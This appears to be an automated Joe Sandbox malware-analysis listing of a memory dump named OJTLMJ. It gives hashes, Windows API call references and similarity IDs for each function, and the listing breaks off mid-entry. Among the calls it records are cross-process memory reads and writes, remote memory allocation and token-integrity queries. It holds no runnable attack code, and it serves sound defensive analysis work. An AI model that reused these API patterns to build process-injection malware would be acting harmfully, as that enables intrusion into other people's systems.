                                                                                                                • Opcode ID: 51cdf4a47d6961a2a232f3f7691c930ab630b6aaca6e638b4ed42158ee41e1c2
                                                                                                                • Instruction ID: c1918786d4813b23af9b78c8c180c6db5a351d4c2726f1e6113cc78c5a8e74cb
                                                                                                                • Opcode Fuzzy Hash: 51cdf4a47d6961a2a232f3f7691c930ab630b6aaca6e638b4ed42158ee41e1c2
                                                                                                                • Instruction Fuzzy Hash: 70011735D0071AEBDF00ABA5ED48AEEBB79FB08B01F450055E542F2250DB7095509BB1
                                                                                                                APIs
                                                                                                                • CLSIDFromProgID.OLE32 ref: 00D7A874
                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 00D7A88F
                                                                                                                • lstrcmpiW.KERNEL32(?,00000000), ref: 00D7A89D
                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00D7A8AD
                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 00D7A8B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 3897988419-0
                                                                                                                • Opcode ID: 04b740fa075e594eb090733218d07021ad4708e09a4886febf9afa2695f92e86
                                                                                                                • Instruction ID: 757c7f0f475ae1252cbeca3d0f63d4a2356c1db6f0b8956074ba7a53ae7392ab
                                                                                                                • Opcode Fuzzy Hash: 04b740fa075e594eb090733218d07021ad4708e09a4886febf9afa2695f92e86
                                                                                                                • Instruction Fuzzy Hash: 60018F76600206AFDB114F58DC44B9EBBAEEF84351F158036F905D2210E770DD419BB2
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D7B806
                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D7B810
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D7B81F
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D7B826
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D7B83C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: da6fd0eda4942b9f474e2cba00a0459dcca574669fbaa1e13d9a53d261ae29c4
                                                                                                                • Instruction ID: 2c65c2dd656e630b3484e36dfed05fad5647546411d4b4bdcb48b5eb9d05f7ff
                                                                                                                • Opcode Fuzzy Hash: da6fd0eda4942b9f474e2cba00a0459dcca574669fbaa1e13d9a53d261ae29c4
                                                                                                                • Instruction Fuzzy Hash: A8F04975200306AFEB211FA5EC88F6B3B6EFF4A764F04402AF945C7250DB609842DA71
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D7B7A5
                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D7B7AF
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D7B7BE
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D7B7C5
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D7B7DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: 08fd6b5783f92e90b9868c227cf62f3135d50b07a854757a77e53e4277eb34a7
                                                                                                                • Instruction ID: 879270793c2268f14da045eaeb493755f5d7b49fe5ae652900c22a96b6451931
                                                                                                                • Opcode Fuzzy Hash: 08fd6b5783f92e90b9868c227cf62f3135d50b07a854757a77e53e4277eb34a7
                                                                                                                • Instruction Fuzzy Hash: 53F04F712403466FEB101FA5AC89F673BADFF86765F14402AF945C7250DB609C429A70
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00D7FA8F
                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00D7FAA6
                                                                                                                • MessageBeep.USER32(00000000), ref: 00D7FABE
                                                                                                                • KillTimer.USER32(?,0000040A), ref: 00D7FADA
                                                                                                                • EndDialog.USER32(?,00000001), ref: 00D7FAF4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3741023627-0
                                                                                                                • Opcode ID: ad7b898c7348485cd49f26d15a9c1b3f4d94c3aab7b886ee7d5b24d2e372fcb0
                                                                                                                • Instruction ID: 41f04a8c33f0458b6a2bb939c0a1e9375d8dbcb066b1693c5b99a146cd6349ed
                                                                                                                • Opcode Fuzzy Hash: ad7b898c7348485cd49f26d15a9c1b3f4d94c3aab7b886ee7d5b24d2e372fcb0
                                                                                                                • Instruction Fuzzy Hash: DF018130500706ABEB319B10DD4EF9677B9BB00B09F04427AB18BA55E0EBF0A944CA60
                                                                                                                APIs
                                                                                                                • EndPath.GDI32(?), ref: 00D5B526
                                                                                                                • StrokeAndFillPath.GDI32(?,?,00DBF583,00000000,?), ref: 00D5B542
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00D5B555
                                                                                                                • DeleteObject.GDI32 ref: 00D5B568
                                                                                                                • StrokePath.GDI32(?), ref: 00D5B583
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2625713937-0
                                                                                                                • Opcode ID: ee8296cd58475ae58c9e05050c81e1358f145caf14b03f8bc929a3882d73084f
                                                                                                                • Instruction ID: f1ce79aeaacea912f8e0a3c40c2ac45d4a9fd2ebaa57becc5af340ecc816ecb2
                                                                                                                • Opcode Fuzzy Hash: ee8296cd58475ae58c9e05050c81e1358f145caf14b03f8bc929a3882d73084f
                                                                                                                • Instruction Fuzzy Hash: 42F0C930004706AFDB195F2AED08B643FE5B701322F188265F8A9981F0D7328AD9DF30
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00D8FAB2
                                                                                                                • CoCreateInstance.OLE32(00DCDA7C,00000000,00000001,00DCD8EC,?), ref: 00D8FACA
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • CoUninitialize.OLE32 ref: 00D8FD2D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 2683427295-24824748
                                                                                                                • Opcode ID: 2f2ed8d8489c7f6a289ae287e7f6028c08e4a6594588844c5d5e0779b9378048
                                                                                                                • Instruction ID: 7a2b7d5eda20853bfcca0615759de2edfb5348ef7fd38e1a2dde4cc9e4286eb8
                                                                                                                • Opcode Fuzzy Hash: 2f2ed8d8489c7f6a289ae287e7f6028c08e4a6594588844c5d5e0779b9378048
                                                                                                                • Instruction Fuzzy Hash: B5A14A71508305AFD700EF64C892EABB7E9EF88704F40491DF59597192EB70EA09CBB2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D878AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00D878CB
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00D8F04D
                                                                                                                • CoCreateInstance.OLE32(00DCDA7C,00000000,00000001,00DCD8EC,?), ref: 00D8F066
                                                                                                                • CoUninitialize.OLE32 ref: 00D8F083
                                                                                                                  • Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
                                                                                                                  • Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 2126378814-24824748
                                                                                                                • Opcode ID: b49aee6ab10a8239881215901223557c7623a8e14ad3e3a6ec3042e7cd70da42
                                                                                                                • Instruction ID: df64b22d69869c6f75447b0fcdb205b03e23eee07677adabeea8fa9467694da7
                                                                                                                • Opcode Fuzzy Hash: b49aee6ab10a8239881215901223557c7623a8e14ad3e3a6ec3042e7cd70da42
                                                                                                                • Instruction Fuzzy Hash: 95A138756043019FCB10EF14C884E6ABBE6FF89324F148958F8999B3A1DB31ED45CBA1
                                                                                                                APIs
                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00D63F7D
                                                                                                                  • Part of subcall function 00D6EE80: __87except.LIBCMT ref: 00D6EEBB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorHandling__87except__start
                                                                                                                • String ID: pow
                                                                                                                • API String ID: 2905807303-2276729525
                                                                                                                • Opcode ID: b88125bf3a2355041ed347b1149100c6df7b9f93146f8ec2bb070b42d32f84d1
                                                                                                                • Instruction ID: 871e3bc83501773424931025c16b2da3b7a2636a0d069564cae6fe647be43984
                                                                                                                • Opcode Fuzzy Hash: b88125bf3a2355041ed347b1149100c6df7b9f93146f8ec2bb070b42d32f84d1
                                                                                                                • Instruction Fuzzy Hash: 04517820D0960297DB11B718E90237A7BE4DF50710F288D69F4D5822EAEF35CDD8DA76
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: #$+
                                                                                                                • API String ID: 0-2552117581
                                                                                                                • Opcode ID: 8c457decf7f1e0795ad93d1bca520d155157a05247e306c2e98cc5619194e5d5
                                                                                                                • Instruction ID: c7600194abcdb5662a8e1c1ce9d932e087fe2e72b339897495c2ef2f58d99a0c
                                                                                                                • Opcode Fuzzy Hash: 8c457decf7f1e0795ad93d1bca520d155157a05247e306c2e98cc5619194e5d5
                                                                                                                • Instruction Fuzzy Hash: 1551DB34104246CFDF25EF68C485AEA3BB6EF26311F184055FC929B292D7349C4AD735
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00DDDC40,?,0000000F,0000000C,00000016,00DDDC40,?), ref: 00D8507B
                                                                                                                  • Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
                                                                                                                  • Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519
                                                                                                                  • Part of subcall function 00D4B8A7: _memmove.LIBCMT ref: 00D4B8FB
                                                                                                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00D850FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                • String ID: REMOVE$THIS
                                                                                                                • API String ID: 2528338962-776492005
                                                                                                                • Opcode ID: ff89f5e17672056ac3715d5f3e9dfb84c04b0818ae2aef5a3fff9653ceb69e05
                                                                                                                • Instruction ID: 6e48833569ba78e0649a7b95cebe324bd3ed169c025b4fb75e87f04f65c8dfa5
                                                                                                                • Opcode Fuzzy Hash: ff89f5e17672056ac3715d5f3e9dfb84c04b0818ae2aef5a3fff9653ceb69e05
                                                                                                                • Instruction Fuzzy Hash: 9041AF74A0060A9FCF01EF64D885AAEB7B5FF48314F088469E85AAB356DB34DD45CB70
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D84D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D7C9FE,?,?,00000034,00000800,?,00000034), ref: 00D84D6B
                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D7CFC9
                                                                                                                  • Part of subcall function 00D84D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D7CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00D84D36
                                                                                                                  • Part of subcall function 00D84C65: GetWindowThreadProcessId.USER32(?,?), ref: 00D84C90
                                                                                                                  • Part of subcall function 00D84C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D7C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00D84CA0
                                                                                                                  • Part of subcall function 00D84C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D7C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00D84CB6
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D7D036
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D7D083
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                • String ID: @
                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                • Opcode ID: c35f325013c67f96e8cca99869396eed0e022da3d74e80ac27e670a074e10b54
                                                                                                                • Instruction ID: 115785bf20822680fb6af9ff9100980bfc27d20a0a2d184cbeb9bd2e88a545c6
                                                                                                                • Opcode Fuzzy Hash: c35f325013c67f96e8cca99869396eed0e022da3d74e80ac27e670a074e10b54
                                                                                                                • Instruction Fuzzy Hash: A7412976900219AFDB10EFA4CC85FEEBBB8EF49700F148095EA49B7181DA716E45CB71
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00DDDBF0,00000000,?,?,?,?), ref: 00DAA4E6
                                                                                                                • GetWindowLongW.USER32 ref: 00DAA503
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DAA513
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long
                                                                                                                • String ID: SysTreeView32
                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                • Opcode ID: 826653e50ac9c71d3dc6e13aea3acf94ea14ad65652a1c0d113da1b17a5009eb
                                                                                                                • Instruction ID: 69d1408c245673788cf027220faa7a60aeb0cd54486fa235aba775f7fb3a58fd
                                                                                                                • Opcode Fuzzy Hash: 826653e50ac9c71d3dc6e13aea3acf94ea14ad65652a1c0d113da1b17a5009eb
                                                                                                                • Instruction Fuzzy Hash: F331A031500606AFDB119E38CC45BE67BA9EB4A324F244725F979922E0D770E854DB70
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00DA9F6B
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00DA9F7F
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DA9FA3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: SysMonthCal32
                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                • Opcode ID: 672a9788ae75b1e7d0af246b74564c911411737fd60c9c4eed7369a3523b75f3
                                                                                                                • Instruction ID: 7a24fb7e985bb475db94b6fe96063b3f17503ad3048275944efcb240f2d31f73
                                                                                                                • Opcode Fuzzy Hash: 672a9788ae75b1e7d0af246b74564c911411737fd60c9c4eed7369a3523b75f3
                                                                                                                • Instruction Fuzzy Hash: 7B21DE32540219BFDF118F94CC82FEA7B69EF49724F154214FA55AB1D0D6B1E854CBB0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DAA74F
                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DAA75D
                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DAA764
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                • String ID: msctls_updown32
                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                • Opcode ID: 1d6aee4dc91245b1d7f6324249dde1c4066e6121a1538759c68681b8a897d6b6
                                                                                                                • Instruction ID: 58f4fff54ed6ff5d05996ca3d9cd12daea5827d15f008e09c15a4d617ff52228
                                                                                                                • Opcode Fuzzy Hash: 1d6aee4dc91245b1d7f6324249dde1c4066e6121a1538759c68681b8a897d6b6
                                                                                                                • Instruction Fuzzy Hash: 78215CB5600209AFDB14DF68CCC1EA737ADEB4A394B084559FA019B2A1CB71ED51CAB1
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DA983D
                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DA984D
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DA9872
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
